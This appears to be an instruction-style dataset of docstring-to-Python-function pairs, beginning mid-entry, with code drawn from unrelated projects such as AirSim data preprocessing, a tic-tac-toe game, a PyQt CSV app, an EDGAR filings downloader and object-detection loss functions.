+folders: list of folders to collect data from. [/INST] def generateDataMapAirSim(folders):
+ all_mappings = {}
+ for folder in folders:
+ print('Reading data from {0}...'.format(folder))
+ current_df = pd.read_csv(os.path.join(folder, 'airsim_rec.txt'), sep='\t')
+ for i in range(1, current_df.shape[0] - 1, 1):
+ previous_state = list(current_df.iloc[i-1][['Steering', 'Throttle', 'Brake', 'Speed (kmph)']])
+ current_label = list((current_df.iloc[i][['Steering']] + current_df.iloc[i-1][['Steering']] + current_df.iloc[i+1][['Steering']]) / 3.0)
+ image_filepath = os.path.join(os.path.join(folder, 'images'), current_df.iloc[i]['ImageName']).replace('\\', '/')
+ if (image_filepath in all_mappings):
+ print('Error: attempting to add image {0} twice.'.format(image_filepath))
+ all_mappings[image_filepath] = (current_label, previous_state)
+ mappings = [(key, all_mappings[key]) for key in all_mappings]
+ random.shuffle(mappings)
+ return mappings
+[INST] Primary function for data pre-processing. Reads and saves all data as h5 files.
+Inputs:
+folders: a list of all data folders
+output_directory: location for saving h5 files
+train_eval_test_split: dataset split ratio. [/INST] def cook(folders, output_directory, train_eval_test_split):
+ output_files = [os.path.join(output_directory, f) for f in ['train.h5', 'eval.h5', 'test.h5']]
+ if (any([os.path.isfile(f) for f in output_files])):
+ print("Preprocessed data already exists at: {0}. Skipping preprocessing.".format(output_directory))
+ else:
+ all_data_mappings = generateDataMapAirSim(folders)
+ split_mappings = splitTrainValidationAndTestData(all_data_mappings, split_ratio=train_eval_test_split)
+ for i in range(0, len(split_mappings), 1):
+ print('Processing {0}...'.format(output_files[i]))
+ saveH5pyData(split_mappings[i], output_files[i])
+ print('Finished saving {0}.'.format(output_files[i]))
+[INST] creates a mask with class id values as pixel values
+from the color ground truth mask image.. [/INST] def convert(fname: str) -> None:
+ img = cv2.imread(fname)
+ img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
+ img_colors = np.unique(img.reshape(-1, img.shape[2]), axis=0)
+ label_id_fname = fname.replace("_gtFine_color", "_gtFine_labelIds")
+ color_mask = np.zeros(img.shape, dtype=np.uint8)
+ color_mask[np.where((img == [234, 30, 39]).all(axis=2))] = np.array([0])
+ color_mask[np.where((img == [101, 190, 110]).all(axis=2))] = np.array([1])
+ color_mask[np.where((img == [24, 92, 163]).all(axis=2))] = np.array([2])
+ color_mask[np.where((img == [224, 212, 28]).all(axis=2))] = np.array([3])
+ color_mask = color_mask[:, :, 0]
+ cv2.imwrite(label_id_fname, color_mask)
+[INST] Take in a player input and assign their marker as 'X'
+or 'O'. Think about using while loops to continually
+ask until you get a correct answer.. [/INST] def player_input():
+ player1 = input("\nPlayer 1 - Please pick a marker 'X' or 'O': ").upper()
+ val = validate(player1)
+ if val[0]:
+ player2 = val[1]
+ else:
+ return False
+ out = {'p1': [player1], 'p2': [player2]}
+ global chance
+ first = choose_first()
+ if first == 0:
+ print('Player 1 goes first', end='')
+ out['p1'].append(0)
+ out['p2'].append(1)
+ chance = player1
+ else:
+ print('Player 2 goes first', end='')
+ out['p1'].append(1)
+ out['p2'].append(0)
+ chance = player2
+ return out
+[INST] Uses the random module to randomly decide which player
+goes first. Lookup random.randint() Return a string of
+which player went first.. [/INST] def choose_first():
+ return random.randint(0, 1)
+[INST] Returns a boolean indicating whether a space on the board
+is freely available.. [/INST] def space_check(board, position):
+ return board[position] == ''
+[INST] Checks if the board is full and returns a boolean value.
+True if full, False otherwise.. [/INST] def full_board_check(board):
+ return not '' in board
+[INST] Takes in a board and a mark (X or O) and then checks to
+see if that mark has won.. [/INST] def win_check(board, mark):
+ possibilities = [
+ board[0:3],
+ board[3:6],
+ board[6:9],
+ board[0:7:3],
+ board[1:8:3],
+ board[2:9:3],
+ board[0:9:4],
+ board[2:8:2]]
+ return [mark] * 3 in possibilities
+[INST] Asks the player if they want to play again and returns a
+boolean True if they do want to play again.. [/INST] def replay():
+ while True:
+ confirm = input('Do you want to replay ([Y]es/[N]o)? ')
+ if confirm[0].lower() == 'y':
+ return True
+ elif confirm[0].lower() == 'n':
+ return False
+ else:
+ print('Input not recognized, ', end='')
+ continue
+[INST] Information about the function.
+INPUT: No input
+OUTPUT: Hello. [/INST] def name_function():
+ print('Hello')
+[INST] Saves the data in the model to a the current file. [/INST] def save_data(self):
+ with open(self.filename,'w',encoding='utf-8') as fh:
+ writer = csv.writer(fh)
+ writer.writerow(self._headers)
+ writer.writerows(self._data)
+[INST] opens a window to add transactions. [/INST] def add_transaction(self):
+ self.formwindow = FormWindow()
+ self.formwindow.submitted.connect(self.foo)
+ self.formwindow.show()
+[INST] opens the csv file and connect the model with view
+edit needed. [/INST] def open_csv(self):
+ if True:
+ table = TableWindow()
+ filename = 'test.csv'
+ self.model = CsvTableModel(filename)
+ self.tableview.setModel(self.model)
+ self.row_above_btn.setEnabled(True)
+ self.row_below_btn.setEnabled(True)
+ self.row_remove_btn.setEnabled(True)
+ self.save_btn.setEnabled(True)
+[INST] Insert a ROW above a selected ROW. [/INST] def row_above(self):
+ selected = self.tableview.selectedIndexes()
+ row = selected[0].row() if selected else 0
+ self.model.insertRows(row,1,None)
+[INST] Insert a ROW below a selected ROW. [/INST] def row_below(self,somedata):
+ selected = self.tableview.selectedIndexes()
+ row = selected[-1].row() if selected else self.model.rowCount(None)
+ self.model.insertRows(row+1,1,None,somedata)
+[INST] calling the save_data function in the CsvTableModel Class. [/INST] def save_file(self):
+ if self.model:
+ self.model.save_data()
+[INST] Method will Emit a signal "submitted" to the mainwindow.
+This data is used for the "TableView" model. [/INST] def onsubmit(self):
+ date = (self.date_widget.date().toString('yyyy-MM-dd'))
+ self.submitted.emit(self.transaction_type.currentText(),
+ date,
+ self.seller_name.text(),
+ self.product.currentText(),
+ self.amount.text(),
+ self.ppkg.text(),
+ self.total_price.text()
+ )
+ self.close()
+[INST] Adds the "item" to the end of the list. [/INST] def add_data(self,item_name):
+ self._data.append(item_name)
+[INST] Removes the "item" from the list. [/INST] def remove_data(self,item_name):
+ self._data.remove(item_name)
+[INST] Saves the item names in the model to the file. [/INST] def save_data(self):
+ with open(self.filename,'w',encoding='utf-8') as fh:
+ writer = csv.writer(fh)
+ writer.writerow(self._headers)
+ writer.writerow(self._data)
+[INST] Updates the data in the graph when the filter is applied.. [/INST] def update_data(self):
+ self.series.clear()
+ self.pieseries.clear()
+ todate = (self.to_date.date().toString('yyyy-MM-dd'))
+ fromdate = (self.from_date.date().toString('yyyy-MM-dd'))
+ self.df = pd.read_csv('test.csv')
+ self.days = pd.date_range(start= todate,end=fromdate)
+ x = [i for i in self.df['Date'] if i in self.days]
+ self.temp_list = sorted(list(set(x)))
+ income = [sum(self.df.loc[(self.df['Date'] == i) & (self.df['Transaction Type'] == 'Sell'),'Total Price']) for i in self.temp_list]
+ expense = [sum(self.df.loc[(self.df['Date'] == i) & (self.df['Transaction Type'] == 'Buy' ),'Total Price']) for i in self.temp_list]
+ piecount = len(self.c._data)
+ item_list = self.c._data
+ for i in range(piecount):
+ item_name = item_list[i]
+ item_sold = [sum(self.df.loc[(self.df['Date'] == i ) & (self.df['Transaction Type'] == 'Buy') & (self.df[' Product ']== item_name),
+ ' Amount (kg) ']) for i in self.temp_list]
+ slice_ = qtch.QPieSlice(item_list[i],sum(item_sold))
+ self.pieseries.append(slice_)
+ categories = self.temp_list
+ Income = qtch.QBarSet("Income")
+ Expense = qtch.QBarSet("Expense")
+ Income.append(income)
+ Expense.append(expense)
+ self.series.append(Income)
+ self.series.append(Expense)
+ self.axis.append(categories)
+[INST] User can enter items with the help of a dialog box
+item_name stores the value entered in the dialogbox and returns ("enter item",bool state). [/INST] def add_item(self):
+ item_name = qtw.QInputDialog.getText(self,"Add Item",
+ "Enter Item",
+ qtw.QLineEdit.Normal)
+ if item_name[0] == "":
+ qtw.QMessageBox.critical(self,"Error","Item cannot be an empty word")
+ elif item_name[0] in self.c._data:
+ qtw.QMessageBox.critical(self,"Error","Item is already added")
+ else:
+ self.c.add_data(item_name[0])
+ self.c.save_data()
+[INST] Read all sas '.csv' files and return results in a dictionary
+Returns
+
+Results from sas .csv files. [/INST] def _get_sas_csv_data(self) -> dict:
+ csv_files = glob.glob("*.csv")
+ csv_data = {}
+ for file in csv_files:
+ if os.path.getsize(file) > 0:
+ csv_file_df = pd.read_csv(file)
+ for column_name in csv_file_df.columns:
+ csv_data[column_name] = np.array(csv_file_df[column_name])
+ return csv_data
+[INST] Generate the SAS input based on the template
+Parameters
+
+params
+Parameters used when rendering template. [/INST] def prerun(self, params: Parameters):
+ params_copy = params.convert_units()
+ print("Pre-run for SAS Plugin")
+ self._run_time = time.time_ns()
+ super().prerun(params_copy, filename=self.sas_inp_name)
+[INST] Read SAS results and create results object
+Parameters
+
+params
+Parameters used to create SAS model
+
+Returnss
+
+SAS results object. [/INST] def postrun(self, params: Parameters) -> ResultsSAS:
+ print("Post-run for SAS Plugin")
+ if Path("CHANNEL.dat").is_file():
+ with open("CHANNEL.dat", "r") as file_in, open("CHANNEL.csv", "w") as file_out:
+ subprocess.run(str(self.conv_channel), stdin=file_in, stdout=file_out)
+ if Path("PRIMAR4.dat").is_file():
+ with open("PRIMAR4.dat", "r") as file_in, open("PRIMAR4.csv", "w") as file_out:
+ subprocess.run(str(self.conv_primar4), stdin=file_in, stdout=file_out)
+ time = datetime.fromtimestamp(self._run_time * 1e-9)
+ inputs = [p.name for p in self.extra_inputs]
+ inputs.append('SAS.inp')
+ outputs = [p for p in Path.cwd().iterdir() if p.name not in inputs]
+ return ResultsSAS(params, time, inputs, outputs)
+[INST] Save parameters to a pickle file
+Parameters
+
+filename_or_obj
+Path to open file or file object write to. [/INST] def save(self, filename_or_obj: Union[str, BinaryIO]):
+ if isinstance(filename_or_obj, str):
+ with open(filename_or_obj, 'wb') as file_obj:
+ self._save_mapping(file_obj)
+ else:
+ self._save_mapping(filename_or_obj)
+[INST] Load parameters from a pickle file
+Parameters
+
+filename_or_obj
+Path to pickle file or file object to read from. [/INST] def load(self, filename_or_obj: Union[str, BinaryIO]):
+ if isinstance(filename_or_obj, str):
+ with open(filename_or_obj, 'rb') as fh:
+ self._load_mapping(fh)
+ else:
+ self._load_mapping(filename_or_obj)
+[INST] Return parameters from a pickle file
+Parameters
+
+filename_or_obj
+Path to pickle file or file object to read from. [/INST] def from_pickle(cls, filename_or_obj: Union[str, BinaryIO]) -> Parameters:
+ params = cls()
+ params.load(filename_or_obj)
+ return params
+[INST] Feedforward behavior of the net.. [/INST] def forward(self, x):
+ x = x.view(x.shape[0], -1)
+ x = F.relu(self.fc1(x))
+ x = F.log_softmax(self.fc2(x), dim=1)
+ return x
+[INST] Print a table of DIF status information to STDOUT.. [/INST] def print_status_table(dif_statuses: List[DIFStatus],
+ table_format: str) -> None:
+ rows = []
+ headers = [
+ "IP", "DIF Updated", "HW Updated", "DIF Contributor*",
+ "HW Contributor*", "Functions\nDefined", "Functions\nImplemented",
+ "Stage"
+ ]
+ for dif_status in dif_statuses:
+ hw_last_modified = dif_status.hw_last_modified[:10]
+ dif_last_modified = dif_status.dif_last_modified[:10]
+ if dif_status.hw_last_modified > dif_status.dif_last_modified:
+ hw_last_modified = colored(hw_last_modified, "yellow")
+ dif_last_modified = colored(dif_last_modified, "yellow")
+ if dif_status.api_complete:
+ num_funcs_defined = colored(dif_status.num_functions_defined,
+ "green")
+ num_funcs_implemented = colored(
+ dif_status.num_functions_implemented, "green")
+ else:
+ num_funcs_defined = colored(dif_status.num_functions_defined,
+ "red")
+ num_funcs_implemented = colored(
+ dif_status.num_functions_implemented, "red")
+ rows.append([
+ dif_status.ip, dif_last_modified, hw_last_modified,
+ "\n".join(dif_status.dif_main_contributors),
+ "\n".join(dif_status.hw_main_contributors), num_funcs_defined,
+ num_funcs_implemented, dif_status.lifecycle_state
+ ])
+ print("DIF Statuses:")
+ print(tabulate(rows, headers, tablefmt=table_format))
+ print("""*Only the top two contributors (by LOC) """
+ """for each component are listed.""")
+ print(colored("Yellow", "yellow"),
+ "\t= HW has been updated since the DIF.")
+ print(
+ colored("Green", "green"),
+ """\t= DIF API, as defined in the current header file, is complete. """
+ """Note, the header file may lack necessary API functionality.""")
+ print(colored("Red", "red"),
+ ("\t= DIF API is incomplete, as defined in the header file or the "
+ "work has not yet begun."))
+[INST] Print a table of specific functions names DIF functions to STDOUT.. [/INST] def print_function_set(dif_statuses: List[DIFStatus],
+ dif_function_type: _DIFFunctionType,
+ table_format: str) -> None:
+ if dif_function_type == _DIFFunctionType.ALERT:
+ print("Alert Functions:")
+ elif dif_function_type == _DIFFunctionType.IRQ:
+ print("IRQ Functions:")
+ elif dif_function_type == _DIFFunctionType.UNIMPLEMENTED:
+ print("Unimplemented Functions:")
+ else:
+ logging.error("Invalid function type to print table.")
+ sys.exit(1)
+ rows = []
+ headers = ["IP", "Function"]
+ for dif_status in dif_statuses:
+ if dif_function_type == _DIFFunctionType.ALERT:
+ if dif_status.alert_funcs:
+ rows.append([dif_status.ip, "\n".join(dif_status.alert_funcs)])
+ elif dif_function_type == _DIFFunctionType.IRQ:
+ if dif_status.irq_funcs:
+ rows.append([dif_status.ip, "\n".join(dif_status.irq_funcs)])
+ elif dif_function_type == _DIFFunctionType.UNIMPLEMENTED:
+ if not dif_status.api_complete:
+ rows.append(
+ [dif_status.ip, "\n".join(dif_status.funcs_unimplemented)])
+ else:
+ logging.error("Invalid function type to print table.")
+ sys.exit(1)
+ print(tabulate(rows, headers, tablefmt=table_format))
+[INST] Get all urls for specific company according to CIK that match
+start date, end date, filing_type, and count parameters.. [/INST] def _get_urls_for_cik(self, cik, **kwargs):
+ self.params['CIK'] = cik
+ links = []
+ self.params["start"] = 0
+ while len(links) < self._client.count:
+ data = self._client.get_soup(self.path, self.params, **kwargs)
+ links.extend([link.string for link in data.find_all("filinghref")])
+ self.params["start"] += self._client.count
+ if len(data.find_all("filinghref")) == 0:
+ break
+ txt_urls = [link[:link.rfind("-")] + ".txt" for link in links]
+ return txt_urls[:self.client.count]
+[INST] Save files in specified directory.. [/INST] def save(self, directory):
+ urls = self.get_urls()
+ if len(urls) == 0:
+ raise ValueError("No filings available.")
+ doc_names = [url.split("/")[-1] for url in urls]
+ for (url, doc_name) in list(zip(urls, doc_names)):
+ cik = doc_name.split('-')[0]
+ data = requests.get(url).text
+ path = os.path.join(directory, cik, self.filing_type.value)
+ make_path(path)
+ path = os.path.join(path, doc_name)
+ with open(path, "w") as f:
+ f.write(data)
+[INST] Sanitizes date to be in acceptable format for EDGAR.. [/INST] def sanitize_date(date):
+ if isinstance(date, datetime.datetime):
+ return date.strftime("%Y%m%d")
+ elif isinstance(date, str):
+ if len(date) != 8:
+ raise TypeError('Date must be of the form YYYYMMDD')
+ elif isinstance(date, int):
+ if date < 10 ** 7 or date > 10 ** 8:
+ raise TypeError('Date must be of the form YYYYMMDD')
+ return date
+[INST] Make directory based on filing info.. [/INST] def make_path(path, **kwargs):
+ if not os.path.exists(path):
+ try:
+ os.makedirs(path, **kwargs)
+ except OSError as e:
+ if e.errno != errno.EEXIST:
+ raise OSError
+[INST] Ensures response from EDGAR is valid.. [/INST] def _validate_response(response):
+ error_messages = ("The value you submitted is not valid",
+ "No matching Ticker Symbol.",
+ "No matching CIK.",
+ "No matching companies.")
+ if response is None:
+ raise EDGARQueryError("No response.")
+ status_code = response.status_code
+ if 400 <= status_code < 500:
+ if status_code == 400:
+ raise EDGARQueryError("The query could not be completed. "
+ "The page does not exist.")
+ else:
+ raise EDGARQueryError("The query could not be completed. "
+ "There was a client-side error with your "
+ "request.")
+ elif 500 <= status_code < 600:
+ raise EDGARQueryError("The query could not be completed. "
+ "There was a server-side error with "
+ "your request.")
+ elif any(error_message in response.text for error_message in error_messages):
+ raise EDGARQueryError()
+[INST] Get cik for lookup value.. [/INST] def _get_cik(self, lookup):
+ self._validate_lookup(lookup)
+ try:
+ self._params['CIK'] = lookup
+ soup = self._client.get_soup(self.path, self.params)
+ except EDGARQueryError:
+ del self._params['CIK']
+ self._params['company'] = lookup
+ soup = self._client.get_soup(self.path, self.params)
+ try:
+ span = soup.find('span', {'class': 'companyName'})
+ return span.find('a').getText().split()[0]
+ except AttributeError:
+ warnings.warn("Lookup '{0}' will be skipped. "
+ "Found multiple companies matching '{0}':".format(lookup))
+ warnings.warn('\n'.join(self._get_cik_possibilities(soup)))
+ finally:
+ if self._params.get('company') is not None:
+ del self._params['company']
+ if self._params.get('CIK') is not None:
+ del self._params['CIK']
+[INST] Ensure that lookup is string.. [/INST] def _validate_lookup(lookup):
+ if not isinstance(lookup, str):
+ raise TypeError("Lookup value must be string. Given type {0}.".format(type(lookup)))
+[INST] Publish PR comment with link to build logs.. [/INST] def publish_pr_comment(self, build):
+ pr_comment = PR_COMMENT_TEMPLATE.format(
+ project_name=config.PROJECT_NAME,
+ commit_id=build.commit_id,
+ build_status=build.status,
+ logs_url=build.get_logs_url(),
+ )
+ repo = self._get_repo()
+ LOG.debug('Publishing PR Comment: repo=%s/%s, pr_id=%s, comment=%s',
+ self._github_owner, self._github_repo, build.get_pr_id(), pr_comment)
+ repo.get_pull(build.get_pr_id()).create_issue_comment(pr_comment)
+[INST] plot 3 histogram of data projecting to difference vector w. [/INST] def exec_c3_1_a(X_a, X_b, init_w):
+ n_histogram = 3
+ proj_a = np.zeros((X_a.shape[0], n_histogram))
+ proj_b = np.zeros((X_b.shape[0], n_histogram))
+ new_w = np.zeros((init_w.shape[0], n_histogram))
+ for i in range(n_histogram):
+ new_w[:, i] = (init_w + np.array(np.random.randn(*init_w.shape))).ravel()
+ proj_a[:, i] = utils.project_X_onto_w(X_a, new_w[:, i]).ravel()
+ proj_b[:, i] = utils.project_X_onto_w(X_b, new_w[:, i]).ravel()
+ plot_data.plt_histogram(proj_a, proj_b, new_w)
+[INST] plot probability contours and the optimal projection line. [/INST] def plot_prob_contours(Gaus_dist_a, Gaus_dist_b, with_unbalance=False):
+ assert(isinstance(Gaus_dist_a, model.GausDS) and isinstance(Gaus_dist_b, model.GausDS))
+ X_a, X_b = Gaus_dist_a.data, Gaus_dist_b.data
+ n_a = len(X_a)
+ n_b = len(X_b)
+ l_s_scalar_min = -9
+ l_s_scalar_max = 9
+ ls_x1 = np.linspace(l_s_scalar_min, l_s_scalar_max, 100)
+ ls_x2 = np.linspace(l_s_scalar_min, l_s_scalar_max, 100)
+ mg_x1, mg_x2 = np.meshgrid(ls_x1, ls_x2)
+ pdf_a = Gaus_dist_a.Gaussian_pdf(mg_x1, mg_x2, 100)
+ pdf_b = Gaus_dist_b.Gaussian_pdf(mg_x1, mg_x2, 100)
+ pdf_a = pdf_a * n_a/(n_a+n_b)
+ pdf_b = pdf_b * n_b/(n_a+n_b)
+ fig = plt.figure()
+ ax = fig.add_subplot(111)
+ ax.axis('equal')
+ ax.set_title("2 Class Classification")
+ ax.scatter(X_a[:, 0], X_a[:, 1], marker='.', c='r', label='class a')
+ ax.scatter(X_b[:, 0], X_b[:, 1], marker='+', c='b', label='class b')
+ ax.contour(mg_x1, mg_x2, pdf_a, 10)
+ ax.contour(mg_x1, mg_x2, pdf_b, 10)
+ log_odds = np.log(pdf_a) - np.log(pdf_b)
+ list_border = []
+ for i in range(99):
+ for j in range(99):
+ if (log_odds[i][j]*log_odds[i][j+1] < 0) or (log_odds[i][j]*log_odds[i+1][j] < 0) \
+ or log_odds[i][j] == 0:
+ list_border.append([i, j])
+ bd = np.array(list_border)
+ X1 = np.linspace(l_s_scalar_min, l_s_scalar_max, 100)
+ Y1 = np.linspace(l_s_scalar_min, l_s_scalar_max, 100)
+ ax.scatter(X1[bd[:, 0]], Y1[bd[:, 1]], marker='.', s=15, color='brown', label='decision border')
+ init_w = np.array([1, -2]).reshape(-1, 1)
+ fs_clf = model.FisherScoreClassifier(X_a, X_b, init_w)
+ w_star = fs_clf.classify(plot=False)
+ w_star = np.array(w_star)
+ xielv = w_star[1]/w_star[0]
+ x_point = np.linspace(-5, 3, 100)
+ y_point = x_point * xielv - 4
+ plt.plot(x_point, y_point, c='g', label='optimal w')
+ if with_unbalance:
+ w_star = fs_clf.classify(balanced=False, plot=False)
+ w_star = np.array(w_star)
+ xielv = w_star[1]/w_star[0]
+ x_point = np.linspace(-5, 3, 100)
+ y_point = x_point * xielv - 4
+ plt.plot(x_point, y_point, c='purple', label='unbalanced F(w)')
+ leg = ax.legend(loc='upper right', fancybox=True, fontsize=8)
+ leg.get_frame().set_alpha(0.5)
+ plt.show()
+[INST] project a list of vectors X onto a vector w. [/INST] def project_X_onto_w(X, v_w):
+ w_length = np.linalg.norm(v_w)
+ assert(w_length > 0)
+ return np.divide((X @ v_w), w_length)
+[INST] Signals to the transport that it should stop.. [/INST] async def stop(self):
+ raise NotImplementedError
+[INST] Pushes a message to a channel.. [/INST] async def push(self, event, payload):
+ msg = await self.socket._send_message(self.topic, event, payload)
+ return msg
+[INST] Classification loss (NLL)
+targets dicts must contain the key "labels" containing a tensor of dim [nb_target_boxes]. [/INST] def loss_labels(self, outputs, targets, indices, num_planes, log=True):
+ assert 'pred_logits' in outputs
+ src_logits = outputs['pred_logits']
+ idx = self._get_src_permutation_idx(indices)
+ target_classes_o = torch.cat([tgt[:, 0][J].long() for tgt, (_, J) in zip (targets, indices)])
+ target_classes = torch.full(src_logits.shape[:2], self.num_classes, dtype=torch.int64, device=src_logits.device)
+ target_classes[idx] = target_classes_o
+ loss_ce = F.cross_entropy(src_logits.transpose(1, 2), target_classes, self.empty_weight.cuda())
+ losses = {'loss_ce': loss_ce}
+ if log:
+ losses['class_error'] = 100 - accuracy(src_logits[idx], target_classes_o)[0]
+ return losses
+[INST] Compute the cardinality error, ie the absolute error in the number of predicted non-empty boxes
+This is not really a loss, it is intended for logging purposes only. It doesn't propagate gradients. [/INST] def loss_cardinality(self, outputs, targets, indices, num_planes):
+ pred_logits = outputs['pred_logits']
+ device = pred_logits.device
+ tgt_lengths = torch.as_tensor([tgt.shape[0] for tgt in targets], device=device)
+ card_pred = (pred_logits.argmax(-1) != pred_logits.shape[-1] - 1).sum(1)
+ card_err = F.l1_loss(card_pred.float(), tgt_lengths.float())
+ losses = {'cardinality_error': card_err}
+ return losses
+[INST] Compute the losses related to the bounding boxes, the L1 regression loss and the GIoU loss
+targets dicts must contain the key "boxes" containing a tensor of dim [nb_target_boxes, 4]
+The target boxes are expected in format (center_x, center_y, h, w), normalized by the image size.. [/INST] def loss_param(self, outputs, targets, indices, num_planes, log=True):
+ assert 'pred_param' in outputs
+ idx = self._get_src_permutation_idx(indices)
+ src_param = outputs['pred_param'][idx]
+ target_param = torch.cat([tgt[:, 1:4][i] for tgt, (_, i) in zip(targets, indices)], dim=0)
+ loss_param_l1 = torch.mean(torch.sum(torch.abs(target_param - src_param), dim=1))
+ similarity = torch.nn.functional.cosine_similarity(src_param, target_param, dim=1)
+ loss_param_cos = torch.mean(1-similarity)
+ angle = torch.mean(torch.acos(torch.clamp(similarity, -1, 1)))
+ losses = {}
+ losses['loss_param_l1'] = loss_param_l1
+ losses['loss_param_cos'] = loss_param_cos
+ if log:
+ losses['mean_angle'] = angle * 180.0 / np.pi
+ return losses
+[INST] Compute the losses related to the bounding boxes, the L1 regression loss and the GIoU loss
+targets dicts must contain the key "boxes" containing a tensor of dim [nb_target_boxes, 4]
+The target boxes are expected in format (center_x, center_y, h, w), normalized by the image size.. [/INST] def loss_center(self, outputs, targets, indices, num_planes, log=True):
+ assert 'pred_center' in outputs
+ idx = self._get_src_permutation_idx(indices)
+ src_center = outputs['pred_center'][idx]
+ target_center = torch.cat([tgt[:, 4:6][i] for tgt, (_, i) in zip(targets, indices)], dim=0)
+ delta_xy = torch.abs(target_center - src_center)
+ dist = torch.norm(delta_xy, dim=-1)
+ loss_center_l2 = torch.mean(dist)
+ losses = {}
+ losses['loss_center_instance'] = loss_center_l2
+ if 'gt_plane_pixel_centers' in outputs.keys():
+ gt_plane_pixel_centers = outputs['gt_plane_pixel_centers']
+ pixel_center = outputs['pixel_center']
+ valid_region = outputs['valid_region']
+ mask = valid_region > 0
+ pixel_dist = torch.norm(torch.abs(gt_plane_pixel_centers - pixel_center), dim=1, keepdim=True)
+ loss_pixel_center = torch.mean(pixel_dist[mask])
+ losses['loss_center_pixel'] = loss_pixel_center
+ return losses
+[INST] This performs the loss computation.. [/INST] def forward(self, outputs, targets):
+ outputs_without_aux = {k: v for k, v in outputs.items() if k != 'aux_outputs'}
+ indices = self.matcher(outputs_without_aux, targets)
+ num_planes = sum(tgt.shape[0] for tgt in targets)
+ num_planes = torch.as_tensor([num_planes], dtype=torch.float, device=next(iter(outputs.values())).device)
+ if is_dist_avail_and_initialized():
+ torch.distributed.all_reduce(num_planes)
+ num_planes = torch.clamp(num_planes / get_world_size(), min=1).item()
+ losses = {}
+ for loss in self.losses:
+ losses.update(self.get_loss(loss, outputs, targets, indices, num_planes))
+ losses_aux = []
+ if 'aux_outputs' in outputs.keys():
+ for i, aux_outputs in enumerate(outputs['aux_outputs']):
+ losses_aux_i = {}
+ for loss in self.losses:
+ kwargs = {}
+ if 'param' in loss or 'Q' in loss or 'depth' in loss:
+ continue
+ kwargs = {'log': False}
+ l_dict = self.get_loss(loss, aux_outputs, targets, indices, num_planes, **kwargs)
+ losses_aux_i.update(l_dict)
+ losses_aux.append(losses_aux_i)
+ return losses, indices, losses_aux
+[INST] Randomly sample a batch of experiences from memory.. [/INST] def sample(self, device):
+ experiences = random.sample(self.memory, k=self.batch_size)
+ states = torch.from_numpy(np.vstack([e.state for e in experiences if e is not None])).float().to(device)
+ actions = torch.from_numpy(np.vstack([e.action for e in experiences if e is not None])).long().to(device)
+ rewards = torch.from_numpy(np.vstack([e.reward for e in experiences if e is not None])).float().to(device)
+ next_states = torch.from_numpy(np.vstack([e.next_state for e in experiences if e is not None])).float().to(device)
+ dones = torch.from_numpy(np.vstack([e.done for e in experiences if e is not None]).astype(np.uint8)).float().to(device)
+ return (states, actions, rewards, next_states, dones)
+[INST] Add a new experience to memory.. [/INST] def add(self, state, action, reward, next_state, done):
+ self.length = min(self.length+1, self.buffer_size)
+ max_p = self.get_max_p();
+ self.tree.add(max_p, (state, action, reward, next_state, done))
+[INST] Convenience property to retrieve the value tuple as a tuple of
+datetime objects.. [/INST] def value_as_datetime(self):
+ if self.value is None:
+ return None
+ v1, v2 = self.value
+ if isinstance(v1, numbers.Number):
+ d1 = datetime.utcfromtimestamp(v1 / 1000)
+ else:
+ d1 = v1
+ if isinstance(v2, numbers.Number):
+ d2 = datetime.utcfromtimestamp(v2 / 1000)
+ else:
+ d2 = v2
+ return d1, d2
+[INST] Convenience property to retrieve the value tuple as a tuple of
+date objects.. [/INST] def value_as_date(self):
+ if self.value is None:
+ return None
+ v1, v2 = self.value
+ if isinstance(v1, numbers.Number):
+ dt = datetime.utcfromtimestamp(v1 / 1000)
+ d1 = date(*dt.timetuple()[:3])
+ else:
+ d1 = v1
+ if isinstance(v2, numbers.Number):
+ dt = datetime.utcfromtimestamp(v2 / 1000)
+ d2 = date(*dt.timetuple()[:3])
+ else:
+ d2 = v2
+ return d1, d2
+[INST] Compute functions for plot(df, x)
+Parameters
+
+df
+DataFrame from which visualizations are generated
+x
+A column name from the DataFrame
+cfg
+Config instance
+dtype: str or DType or dict of str or dict of DType, default None
+Specify Data Types for designated column or all columns.. [/INST] def compute_univariate(
+ df: Union[dd.DataFrame, pd.DataFrame],
+ col: Union[str, LatLong],
+ cfg: Config,
+ dtype: Optional[DTypeDef],
+) -> Intermediate:
+ new_col_names, ndf = gen_new_df_with_used_cols(df, col, None, None)
+ x = new_col_names[col]
+ if x is None:
+ raise ValueError
+ frame = EDAFrame(ndf, dtype)
+ col_dtype = frame.get_eda_dtype(x)
+ if isinstance(col_dtype, (Nominal, GeoPoint, SmallCardNum)):
+ srs = frame.get_col_as_str(x)
+ (data,) = dask.compute(nom_comps(srs, cfg))
+ return Intermediate(col=x, data=data, visual_type="categorical_column")
+ elif isinstance(col_dtype, Continuous):
+ (data,) = dask.compute(cont_comps(frame.frame[x], cfg))
+ return Intermediate(col=x, data=data, visual_type="numerical_column")
+ elif isinstance(col_dtype, DateTime):
+ data_dt: List[Any] = []
+ data_dt.append(dask.delayed(calc_stats_dt)(frame.frame[x]))
+ if cfg.line.enable:
+ data_dt.append(dask.delayed(_calc_line_dt)(frame.frame[[x]], cfg.line.unit))
+ data, line = dask.compute(*data_dt)
+ else:
+ data = dask.compute(*data_dt)[0]
+ line = []
+ return Intermediate(
+ col=x,
+ data=data,
+ line=line,
+ visual_type="datetime_column",
+ )
+ elif isinstance(col_dtype, GeoGraphy):
+ (data,) = dask.compute(nom_comps(frame.frame[x], cfg))
+ return Intermediate(col=x, data=data, visual_type="geography_column")
+ else:
+ raise ValueError(f"unprocessed type. col:{x}, type:{col_dtype}")
+[INST] All computations required for plot(df, Nominal). Assume srs is string column.. [/INST] def nom_comps(srs: dd.Series, cfg: Config) -> Dict[str, Any]:
+ data: Dict[str, Any] = dict()
+ data["nrows"] = srs.shape[0]
+ srs = srs.dropna()
+ grps = srs.value_counts(sort=False)
+ data["geo"] = grps
+ data["nuniq"] = grps.shape[0]
+ if cfg.bar.enable or cfg.pie.enable or cfg.value_table.enable:
+ data["bar"] = (
+ grps.nlargest(cfg.bar.bars) if cfg.bar.sort_descending else grps.nsmallest(cfg.bar.bars)
+ )
+ if cfg.bar.bars == cfg.pie.slices and cfg.bar.sort_descending == cfg.pie.sort_descending:
+ data["pie"] = data["bar"]
+ else:
+ data["pie"] = (
+ grps.nlargest(cfg.pie.slices)
+ if cfg.pie.sort_descending
+ else grps.nsmallest(cfg.pie.slices)
+ )
+ if cfg.bar.bars == cfg.value_table.ngroups and cfg.bar.sort_descending:
+ data["value_table"] = data["bar"]
